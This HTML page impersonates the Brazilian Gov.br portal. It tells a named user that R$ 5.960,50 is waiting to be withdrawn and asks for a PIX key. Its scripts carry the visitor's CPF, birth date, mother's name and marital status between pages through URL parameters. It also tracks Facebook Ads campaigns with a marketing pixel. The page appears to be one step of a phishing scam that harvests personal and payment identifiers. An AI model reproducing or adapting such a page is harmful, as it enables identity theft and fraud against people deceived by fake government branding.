<!DOCTYPE html><html lang="pt-BR"><head>
    <!-- UTMify Pixel Code -->
    <script>
      window.pixelId = "68789c1b0184c2e57bc706a6";
      var a = document.createElement("script");
      a.setAttribute("async", "");
      a.setAttribute("defer", "");
      a.src = "https://cdn.utmify.com.br/scripts/pixel/pixel.js";
      document.head.appendChild(a);
    </script>
    <!-- End UTMify Pixel Code -->
    
    <!-- UTM Capture and Preservation System -->
    <script>
      // Sistema de captura e preservação de UTMs do Facebook Ads
      (function() {
        // Função para capturar UTMs da URL
        function captureUTMs() {
          const urlParams = new URLSearchParams(window.location.search);
          const utmParams = {
            utm_source: urlParams.get('utm_source'),
            utm_campaign: urlParams.get('utm_campaign'),
            utm_medium: urlParams.get('utm_medium'),
            utm_content: urlParams.get('utm_content'),
            utm_term: urlParams.get('utm_term')
          };
          
          // Verificar se há UTMs válidas
          const hasUTMs = Object.values(utmParams).some(value => value && value !== '');
          
          if (hasUTMs) {
            console.log('🎯 UTMs capturadas:', utmParams);
            
            // Salvar UTMs no localStorage para persistência
            localStorage.setItem('energia_utm_data', JSON.stringify(utmParams));
            
            // Salvar também no sessionStorage para uso imediato
            sessionStorage.setItem('energia_utm_data', JSON.stringify(utmParams));
            
            // Adicionar UTMs à URL atual se não estiverem presentes
            addUTMsToCurrentURL(utmParams);
            
            return utmParams;
          } else {
            // Tentar recuperar UTMs salvas
            const savedUTMs = localStorage.getItem('energia_utm_data');
            if (savedUTMs) {
              const parsedUTMs = JSON.parse(savedUTMs);
              console.log('🔄 UTMs recuperadas do localStorage:', parsedUTMs);
              
              // Adicionar UTMs recuperadas à URL atual
              addUTMsToCurrentURL(parsedUTMs);
              
              return parsedUTMs;
            }
          }
          
          return null;
        }
        
        // Função para adicionar UTMs à URL atual
        function addUTMsToCurrentURL(utmParams) {
          const currentURL = new URL(window.location.href);
          let hasChanges = false;
          
          Object.entries(utmParams).forEach(([key, value]) => {
            if (value && !currentURL.searchParams.has(key)) {
              currentURL.searchParams.set(key, value);
              hasChanges = true;
            }
          });
          
          if (hasChanges) {
            // Atualizar URL sem recarregar a página
            window.history.replaceState({}, '', currentURL.toString());
            console.log('🔗 URL atualizada com UTMs:', currentURL.toString());
          }
        }
        
        // Função para obter UTMs atuais
        window.getCurrentUTMs = function() {
          const savedUTMs = localStorage.getItem('energia_utm_data');
          return savedUTMs ? JSON.parse(savedUTMs) : null;
        };
        
        // Função para adicionar UTMs a qualquer URL
        window.addUTMsToURL = function(url) {
          const utmData = window.getCurrentUTMs();
          if (!utmData) return url;
          
          const urlObj = new URL(url, window.location.origin);
          Object.entries(utmData).forEach(([key, value]) => {
            if (value) {
              urlObj.searchParams.set(key, value);
            }
          });
          
          return urlObj.toString();
        };
        
        // Função para navegar mantendo UTMs
        window.navigateWithUTMs = function(url) {
          const urlWithUTMs = window.addUTMsToURL(url);
          window.location.href = urlWithUTMs;
        };
        
        // Executar captura quando a página carregar
        document.addEventListener('DOMContentLoaded', function() {
          const capturedUTMs = captureUTMs();
          
          if (capturedUTMs) {
            console.log('✅ Sistema de UTMs ativo:', capturedUTMs);
          } else {
            console.log('ℹ️ Nenhuma UTM detectada');
          }
        });
        
        // Capturar UTMs imediatamente se a página já carregou
        if (document.readyState === 'loading') {
          document.addEventListener('DOMContentLoaded', captureUTMs);
        } else {
          captureUTMs();
        }
      })();
    </script>
    <meta charset="UTF-8">
    <link rel="icon" type="image/png" href="images/960px-Canal_Gov_Logo.png">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Dados para Recebimento - Gov.br</title>

    <!-- Tailwind CSS -->
    <script src="https://cdn.tailwindcss.com"></script>
    <!-- User Data Manager -->
    <script src="../../js/user-data-manager.js"></script>
    <script>
      tailwind.config = {
        theme: {
          extend: {
            colors: {
              "gov-blue": "#1351B4",
              "gov-blue-light": "#2670E8",
              "aneel-blue": "#0d3c78",
              "aneel-blue-dark": "#1a4c8b",
            },
          },
        },
      };
    </script>

    <!-- Remix Icons -->
    <link href="css/remixicon.css" rel="stylesheet">

    <style>
      /* Animation for fade-in */
      @keyframes fade-in {
        from {
          opacity: 0;
          transform: translateY(10px);
        }
        to {
          opacity: 1;
          transform: translateY(0);
        }
      }

      .animate-fade-in {
        animation: fade-in 0.5s ease-out;
      }

      .pix-option {
        transition: all 0.2s ease;
      }

      .pix-option:hover {
        transform: translateY(-2px);
        box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
      }

      .pix-option input:checked + span {
        background-color: #3b82f6;
        border-color: #3b82f6;
        color: white;
      }

      .pix-option input:checked ~ * {
        color: white;
      }

      .pix-option:has(input:checked) {
        background-color: #3b82f6;
        border-color: #3b82f6;
        color: white;
      }
    </style>
  </head>

  <body class="bg-gray-50">
    <div class="min-h-screen bg-gray-100">
      <!-- Header -->
      <header class="bg-white border-b border-gray-200 px-3 py-4">
        <div class="flex items-center justify-between">
          <div class="flex items-center">
            <img alt="gov.br" loading="lazy" width="120" height="40" decoding="async" data-nimg="1" class="h-8 w-auto" src="images/960px-Canal_Gov_Logo.png" style="color: transparent;">
          </div>
          <div class="flex items-center gap-4">
            <div class="relative">
              <button aria-label="Perfil do usuário" class="w-8 h-8 bg-blue-600 rounded-full flex items-center justify-center hover:bg-blue-700 transition-colors focus:outline-none focus:ring-2 focus:ring-blue-500 focus:ring-offset-2">
                <svg fill="currentColor" viewBox="0 0 20 20" class="w-5 h-5 text-white">
                  <path fill-rule="evenodd" d="M10 9a3 3 0 100-6 3 3 0 000 6zm-7 9a7 7 0 1114 0H3z" clip-rule="evenodd"></path>
                </svg>
              </button>
              <div class="absolute right-0 top-full mt-2 w-80 bg-white rounded-lg shadow-xl border border-gray-200 z-50 overflow-hidden hidden" id="user-dropdown">
                <button class="absolute top-4 right-4 text-gray-400 hover:text-gray-600 transition-colors" onclick="toggleDropdown()">
                  <svg fill="currentColor" viewBox="0 0 20 20" class="w-5 h-5">
                    <path fill-rule="evenodd" d="M4.293 4.293a1 1 0 011.414 0L10 8.586l4.293-4.293a1 1 0 111.414 1.414L11.414 10l4.293 4.293a1 1 0 01-1.414 1.414L10 11.414l-4.293 4.293a1 1 0 01-1.414-1.414L8.586 10 4.293 5.707a1 1 0 010-1.414z" clip-rule="evenodd"></path>
                  </svg>
                </button>
                <div class="p-6 text-center border-b border-gray-100">
                  <div class="w-16 h-16 bg-gray-300 rounded-full flex items-center justify-center mx-auto mb-3">
                    <svg fill="currentColor" viewBox="0 0 20 20" class="w-8 h-8 text-white">
                      <path fill-rule="evenodd" d="M10 9a3 3 0 100-6 3 3 0 000 6zm-7 9a7 7 0 1114 0H3z" clip-rule="evenodd"></path>
                    </svg>
                  </div>
                  <h3 class="text-lg font-medium text-gray-900 mb-2" data-user-greeting="">Olá, Silvio!</h3>
                  <div class="bg-yellow-400 text-black text-xs font-bold py-1 px-3 rounded-full inline-block mb-3">SUA CONTA GOV.BR É NÍVEL OURO</div>
                  <a href="#" class="text-blue-600 hover:text-blue-700 text-sm font-medium flex items-center justify-center gap-1">
                    Minha área gov.br
                    <svg fill="currentColor" viewBox="0 0 20 20" class="w-4 h-4">
                      <path fill-rule="evenodd" d="M10.293 3.293a1 1 0 011.414 0l6 6a1 1 0 010 1.414l-6 6a1 1 0 01-1.414-1.414L14.586 11H3a1 1 0 110-2h11.586l-4.293-4.293a1 1 0 010-1.414z" clip-rule="evenodd"></path>
                    </svg>
                  </a>
                </div>
                <div class="p-4">
                  <h4 class="text-sm font-medium text-gray-900 mb-3">Minha conta</h4>
                  <div class="space-y-1">
                    <button class="w-full flex items-center gap-3 px-3 py-2 text-left text-sm text-blue-600 hover:bg-blue-50 rounded-md transition-colors">
                      <svg fill="currentColor" viewBox="0 0 20 20" class="w-4 h-4">
                        <path fill-rule="evenodd" d="M10 9a3 3 0 100-6 3 3 0 000 6zm-7 9a7 7 0 1114 0H3z" clip-rule="evenodd"></path>
                      </svg>
                      Dados Pessoais
                    </button>
                    <button class="w-full flex items-center gap-3 px-3 py-2 text-left text-sm text-blue-600 hover:bg-blue-50 rounded-md transition-colors">
                      <svg fill="currentColor" viewBox="0 0 20 20" class="w-4 h-4">
                        <path fill-rule="evenodd" d="M5 9V7a5 5 0 0110 0v2a2 2 0 012 2v5a2 2 0 01-2-2H5a2 2 0 01-2-2v-5a2 2 2 0 012-2zm8-2v2H7V7a3 3 0 016 0z" clip-rule="evenodd"></path>
                      </svg>
                      Segurança da Conta
                    </button>
                    <button class="w-full flex items-center gap-3 px-3 py-2 text-left text-sm text-blue-600 hover:bg-blue-50 rounded-md transition-colors">
                      <svg fill="currentColor" viewBox="0 0 20 20" class="w-4 h-4">
                        <path d="M13 6a3 3 0 11-6 0 3 3 0 016 0zM18 8a2 2 0 11-4 0 2 2 0 014 0zM14 15a4 4 0 00-8 0v3h8v-3z"></path>
                      </svg>
                      Privacidade
                    </button>
                    <button class="w-full flex items-center gap-3 px-3 py-2 text-left text-sm text-blue-600 hover:bg-blue-50 rounded-md transition-colors">
                      <svg fill="currentColor" viewBox="0 0 20 20" class="w-4 h-4">
                        <path fill-rule="evenodd" d="M18 10a8 8 0 11-16 0 8 8 0 0116 0zm-8-3a1 1 0 00-.867.5 1 1 0 11-1.731-1A3 3 0 0113 8a3.001 3.001 0 01-2 2.83V11a1 1 0 11-2 0v-1a1 1 0 011-1 1 1 0 100-2zm0 8a1 1 0 100-2 1 1 0 000 2z" clip-rule="evenodd"></path>
                      </svg>
                      Ajuda da conta gov.br
                    </button>
                    <button class="w-full flex items-center gap-3 px-3 py-2 text-left text-sm text-blue-600 hover:bg-blue-50 rounded-md transition-colors">
                      <svg fill="currentColor" viewBox="0 0 20 20" class="w-4 h-4">
                        <path fill-rule="evenodd" d="M3 3a1 1 0 00-1 1v12a1 1 0 102 0V4a1 1 0 00-1-1zm10.293 9.293a1 1 0 001.414 1.414l3-3a1 1 0 000-1.414l-3-3a1 1 0 10-1.414 1.414L14.586 9H7a1 1 0 100 2h7.586l-1.293 1.293z" clip-rule="evenodd"></path>
                      </svg>
                      Sair
                    </button>
                  </div>
                </div>
                <div class="absolute bottom-4 right-4">
                  <button class="w-8 h-8 bg-blue-600 rounded-full flex items-center justify-center text-white hover:bg-blue-700 transition-colors">
                    <svg fill="currentColor" viewBox="0 0 20 20" class="w-4 h-4">
                      <path d="M10 2a1 1 0 011 1v1a1 1 0 11-2 0V3a1 1 0 011-1zm4 8a4 4 0 11-8 0 4 4 0 018 0zm-.464 4.95l.707.707a1 1 0 001.414-1.414l-.707-.707a1 1 0 00-1.414 1.414zm2.12-10.607a1 1 0 010 1.414l-.706.707a1 1 0 11-1.414-1.414l.707-.707a1 1 0 011.414 0zM17 11a1 1 0 100-2h-1a1 1 0 100 2h1zm-7 4a1 1 0 011 1v1a1 1 0 11-2 0v-1a1 1 0 011-1zM5.05 6.464A1 1 0 106.465 5.05l-.708-.707a1 1 0 00-1.414 1.414l.707.707zm1.414 8.486l-.707.707a1 1 0 01-1.414-1.414l.707-.707a1 1 0 011.414 1.414zM4 11a1 1 0 100-2H3a1 1 0 000 2h1z" fill-rule="evenodd" clip-rule="evenodd"></path>
                    </svg>
                  </button>
                </div>
              </div>
            </div>
          </div>
        </div>
      </header>

    <!-- Main Content -->
    <main class="px-0 md:px-1 py-4 md:flex md:justify-center md:items-start md:pt-8">
      <div class="bg-white rounded-none md:rounded-lg shadow-none md:shadow-sm border-0 md:border border-gray-200 p-3 mx-0 md:mx-1 md:max-w-2xl w-full">
        
        <div class="text-center mb-8">
          <h1 class="text-2xl font-bold text-gray-800 mb-2">Dados para Recebimento</h1>
          <p class="text-gray-600 mb-4" data-pix-instruction="">Silvio, informe sua chave PIX para receber o valor</p>
          <div class="bg-green-50 border border-green-200 rounded-lg p-4 mb-6">
            <p class="text-sm text-green-700 mb-1">Valor disponível para saque:</p>
            <p class="text-3xl font-bold text-green-600">R$ 5.960,50</p>
          </div>
        </div>

        <form class="space-y-6" id="pixForm">
          <div>
            <label class="block text-sm font-medium text-gray-700 mb-4">Selecione o tipo da sua chave PIX:</label>
            <div class="grid grid-cols-1 md:grid-cols-2 gap-3">
              <label class="pix-option flex items-center p-4 border-2 rounded-lg cursor-pointer transition-all border-gray-200 hover:border-gray-300 hover:bg-gray-50">
                <input class="sr-only" type="radio" value="cpf" name="tipoChave" onchange="updateInputField()">
                <span class="text-2xl mr-3">👤</span>
                <span class="font-medium text-gray-700">CPF</span>
              </label>
              <label class="pix-option flex items-center p-4 border-2 rounded-lg cursor-pointer transition-all border-gray-200 hover:border-gray-300 hover:bg-gray-50">
                <input class="sr-only" type="radio" value="email" name="tipoChave" onchange="updateInputField()">
                <span class="text-2xl mr-3">📧</span>
                <span class="font-medium text-gray-700">E-mail</span>
              </label>
              <label class="pix-option flex items-center p-4 border-2 rounded-lg cursor-pointer transition-all border-gray-200 hover:border-gray-300 hover:bg-gray-50">
                <input class="sr-only" type="radio" value="telefone" name="tipoChave" onchange="updateInputField()">
                <span class="text-2xl mr-3">📱</span>
                <span class="font-medium text-gray-700">Telefone</span>
              </label>
              <label class="pix-option flex items-center p-4 border-2 rounded-lg cursor-pointer transition-all border-gray-200 hover:border-gray-300 hover:bg-gray-50">
                <input class="sr-only" type="radio" value="aleatoria" name="tipoChave" onchange="updateInputField()">
                <span class="text-2xl mr-3">🔑</span>
                <span class="font-medium text-gray-700">Chave Aleatória</span>
              </label>
            </div>
          </div>

          <div id="inputSection" style="display: none;">
            <label for="chavePix" class="block text-sm font-medium text-gray-700 mb-2" id="inputLabel">Digite sua chave PIX:</label>
            <input id="chavePix" placeholder="Digite sua chave PIX" class="w-full px-4 py-3 border rounded-md text-gray-700 placeholder-gray-400 focus:outline-none focus:ring-2 focus:ring-blue-500 focus:border-blue-500 disabled:bg-gray-100 disabled:cursor-not-allowed border-gray-300" required="" type="text" name="chavePix" oninput="validateForm()">
          </div>

          <div class="pt-4">
            <button type="submit" disabled="" id="confirmButton" class="w-full bg-green-600 hover:bg-green-700 disabled:bg-gray-400 disabled:cursor-not-allowed text-white py-3 px-4 rounded-full font-medium text-base transition-colors flex items-center justify-center gap-2">
              <svg class="w-5 h-5" fill="currentColor" viewBox="0 0 20 20">
                <path d="M4 4a2 2 0 00-2 2v4a2 2 0 002 2V6h10a2 2 0 00-2-2H4zm2 6a2 2 0 012-2h8a2 2 0 012 2v4a2 2 0 01-2 2H8a2 2 0 01-2-2v-4zm6 4a2 2 0 100-4 2 2 0 000 4z"></path>
              </svg>
              Confirmar Chave PIX
            </button>
          </div>
        </form>

        <div class="mt-8 p-4 bg-yellow-50 border border-yellow-200 rounded-lg">
          <div class="flex items-center gap-2 mb-2">
            <svg class="w-5 h-5 text-yellow-600" fill="currentColor" viewBox="0 0 20 20">
              <path fill-rule="evenodd" d="M8.257 3.099c.765-1.36 2.722-1.36 3.486 0l5.58 9.92c.75 1.334-.213 2.98-1.742 2.98H4.42c-1.53 0-2.493-1.646-1.743-2.98l5.58-9.92zM11 13a1 1 0 11-2 0 1 1 0 012 0zm-1-8a1 1 0 00-1 1v3a1 1 0 002 0V6a1 1 0 00-1-1z" clip-rule="evenodd"></path>
            </svg>
            <h3 class="font-semibold text-yellow-800">Importante</h3>
          </div>
          <p class="text-yellow-700 text-sm">Verifique cuidadosamente sua chave PIX antes de confirmar. O valor será transferido diretamente para a conta vinculada a esta chave. Certifique-se de que a chave está correta e ativa.</p>
        </div>

        <div class="mt-6 p-4 bg-blue-50 border border-blue-200 rounded-lg">
          <div class="flex items-center gap-2 mb-2">
            <svg class="w-5 h-5 text-blue-600" fill="currentColor" viewBox="0 0 20 20">
              <path fill-rule="evenodd" d="M18 10a8 8 0 11-16 0 8 8 0 0116 0zm-7-4a1 1 0 11-2 0 1 1 0 012 0zM9 9a1 1 0 000 2v3a1 1 0 001 1h1a1 1 0 100-2v-3a1 1 0 00-1-1H9z" clip-rule="evenodd"></path>
            </svg>
            <h3 class="font-semibold text-blue-800">Sobre o PIX</h3>
          </div>
          <p class="text-blue-700 text-sm">O PIX é o sistema de pagamentos instantâneos do Banco Central. A transferência será realizada em até 10 minutos após a confirmação dos dados.</p>
        </div>

      </div>
    </main>
    </div>

    <!-- Footer -->
    <footer class="bg-gray-800 text-white mt-12">
      <div class="max-w-6xl mx-auto px-4 py-8">
        <div class="text-center">
          <img src="images/960px-Canal_Gov_Logo.png" alt="Gov.br" class="h-10 mx-auto mb-4 filter brightness-0 invert">
          <p class="text-gray-400">� 2024 Governo Federal. Todos os direitos reservados.</p>
        </div>
      </div>
    </footer>

    <script>
      // Função para controlar o dropdown do usuário
      function toggleDropdown() {
        const dropdown = document.getElementById('user-dropdown');
        dropdown.classList.toggle('hidden');
      }

      // Função para atualizar o campo de input baseado no tipo selecionado
      function updateInputField() {
        const selectedOption = document.querySelector('input[name="tipoChave"]:checked');
        const inputSection = document.getElementById('inputSection');
        const inputLabel = document.getElementById('inputLabel');
        const inputField = document.getElementById('chavePix');
        
        if (selectedOption) {
          inputSection.style.display = 'block';
          
          // Atualizar label e placeholder baseado no tipo
          switch(selectedOption.value) {
            case 'cpf':
              inputLabel.textContent = 'Digite seu CPF:';
              inputField.placeholder = 'Digite seu CPF (apenas números)';
              inputField.type = 'text';
              break;
            case 'email':
              inputLabel.textContent = 'Digite seu E-mail:';
              inputField.placeholder = 'Digite seu e-mail';
              inputField.type = 'email';
              break;
            case 'telefone':
              inputLabel.textContent = 'Digite seu Telefone:';
              inputField.placeholder = 'Digite seu telefone com DDD';
              inputField.type = 'tel';
              break;
            case 'aleatoria':
              inputLabel.textContent = 'Digite sua chave PIX (Chave Aleatória):';
              inputField.placeholder = 'Cole sua chave PIX aleatória aqui';
              inputField.type = 'text';
              break;
          }
          
          // Limpar o campo quando trocar de tipo
          inputField.value = '';
          validateForm();
        }
      }

      // Função para validar o formulário
      function validateForm() {
        const selectedOption = document.querySelector('input[name="tipoChave"]:checked');
        const inputField = document.getElementById('chavePix');
        const button = document.getElementById('confirmButton');
        
        const isTypeSelected = selectedOption !== null;
        const isInputFilled = inputField.value.trim() !== '';
        
        button.disabled = !(isTypeSelected && isInputFilled);
      }

      // Função para processar o formulário
      function handleSubmit(event) {
        event.preventDefault();
        
        const selectedOption = document.querySelector('input[name="tipoChave"]:checked');
        const inputField = document.getElementById('chavePix');
        
        if (selectedOption && inputField.value.trim()) {
          console.log('🚀 Redirecionando para comprovante...');
          
          // Obter dados da URL atual para propagar
          const urlParams = new URLSearchParams(window.location.search);
          let userData = null;
          
          if (urlParams.has('nome') || urlParams.has('cpf')) {
            userData = {
              nome: urlParams.get('nome'),
              cpf: urlParams.get('cpf'),
              nascimento: urlParams.get('nascimento'),
              nomeMae: urlParams.get('nomeMae'),
              estadoCivil: urlParams.get('estadoCivil'),
              nomeCompleto: urlParams.get('nomeCompleto') || urlParams.get('nome')
            };
            console.log('🔗 Dados encontrados na URL para propagar:', userData);
          }
          
          // Construir URL com dados
          let targetURL = '../comprovante/index.html';
          
          if (userData) {
            const params = new URLSearchParams();
            
            // Adicionar dados do usuário
            if (userData.nome) params.set('nome', userData.nome);
            if (userData.cpf) params.set('cpf', userData.cpf);
            if (userData.nascimento) params.set('nascimento', userData.nascimento);
            if (userData.nomeMae) params.set('nomeMae', userData.nomeMae);
            if (userData.estadoCivil) params.set('estadoCivil', userData.estadoCivil);
            if (userData.nomeCompleto) params.set('nomeCompleto', userData.nomeCompleto);
            
            // Preservar UTMs
            ['utm_source', 'utm_medium', 'utm_campaign', 'utm_term', 'utm_content'].forEach(utm => {
              if (urlParams.has(utm)) {
                params.set(utm, urlParams.get(utm));
              }
            });
            
            if (params.toString()) {
              targetURL += '?' + params.toString();
            }
            
            console.log('🔗 URL com dados:', targetURL);
          }
          
          // Redirecionar para a página de comprovante preservando dados
          if (window.navigateWithUTMs && !userData) {
            window.navigateWithUTMs('../comprovante/index.html');
          } else {
            window.location.href = targetURL;
          }
        }
      }

      // Adicionar event listeners quando a página carregar
      document.addEventListener('DOMContentLoaded', function() {
        const userButton = document.querySelector('[aria-label="Perfil do usuário"]');
        if (userButton) {
          userButton.addEventListener('click', toggleDropdown);
        }

        // Adicionar listener para o formulário
        const form = document.getElementById('pixForm');
        if (form) {
          form.addEventListener('submit', handleSubmit);
        }

        // Fechar dropdown ao clicar fora
        document.addEventListener('click', function(event) {
          const dropdown = document.getElementById('user-dropdown');
          const userButton = document.querySelector('[aria-label="Perfil do usuário"]');
          
          if (dropdown && userButton && 
              !dropdown.contains(event.target) && 
              !userButton.contains(event.target)) {
            dropdown.classList.add('hidden');
          }
        });

        // Adicionar efeitos visuais aos radio buttons
        const radioLabels = document.querySelectorAll('.pix-option');
        radioLabels.forEach(label => {
          const radio = label.querySelector('input[type="radio"]');
          
          radio.addEventListener('change', function() {
            // Remover seleção de todos os labels
            radioLabels.forEach(l => {
              l.classList.remove('bg-blue-500', 'border-blue-500', 'text-white');
              l.classList.add('border-gray-200', 'text-gray-700');
            });
            
            // Adicionar seleção ao label atual
            if (this.checked) {
              label.classList.add('bg-blue-500', 'border-blue-500', 'text-white');
              label.classList.remove('border-gray-200', 'text-gray-700');
            }
          });
        });
        
        // SISTEMA DE ATUALIZAÇÃO DE SAUDAÇÃO
        function updateUserGreeting() {
          console.log('🔍 Atualizando saudação na página chavepix...');
          
          // PRIORIDADE 1: Verificar dados na URL
          const urlParams = new URLSearchParams(window.location.search);
          let userData = null;
          
          if (urlParams.has('nome') || urlParams.has('cpf')) {
            userData = {
              nome: urlParams.get('nome'),
              cpf: urlParams.get('cpf'),
              nascimento: urlParams.get('nascimento'),
              nomeMae: urlParams.get('nomeMae'),
              estadoCivil: urlParams.get('estadoCivil'),
              nomeCompleto: urlParams.get('nomeCompleto') || urlParams.get('nome')
            };
            console.log('✅ Dados encontrados na URL para saudação:', userData);
          }
          
          // PRIORIDADE 2: Tentar user-data-manager
          if (!userData && typeof window.getUserData === 'function') {
            try {
              userData = window.getUserData();
              console.log('✅ Dados obtidos via getUserData para saudação:', userData);
            } catch (error) {
              console.log('❌ Erro getUserData para saudação:', error);
            }
          }
          
          // PRIORIDADE 3: SessionStorage
          if (!userData) {
            const sessionData = sessionStorage.getItem('userData');
            if (sessionData) {
              try {
                userData = JSON.parse(sessionData);
                console.log('✅ Dados obtidos via sessionStorage para saudação:', userData);
              } catch (error) {
                console.log('❌ Erro ao parsear sessionStorage para saudação:', error);
              }
            }
          }
          
          // Atualizar saudação e instrução PIX
          if (userData && userData.nome) {
            const userGreeting = document.querySelector('[data-user-greeting]');
            if (userGreeting) {
              userGreeting.textContent = `Olá, ${userData.nome}!`;
              console.log('✅ Saudação atualizada para:', userData.nome);
            }
            
            const pixInstruction = document.querySelector('[data-pix-instruction]');
            if (pixInstruction) {
              pixInstruction.textContent = `${userData.nome}, informe sua chave PIX para receber o valor`;
              console.log('✅ Instrução PIX atualizada para:', userData.nome);
            }
          } else {
            console.log('⚠️ Nenhum nome encontrado - mantendo saudação padrão');
          }
        }
        
        // Atualizar saudação
        updateUserGreeting();
      });
    </script>
  

</body></html>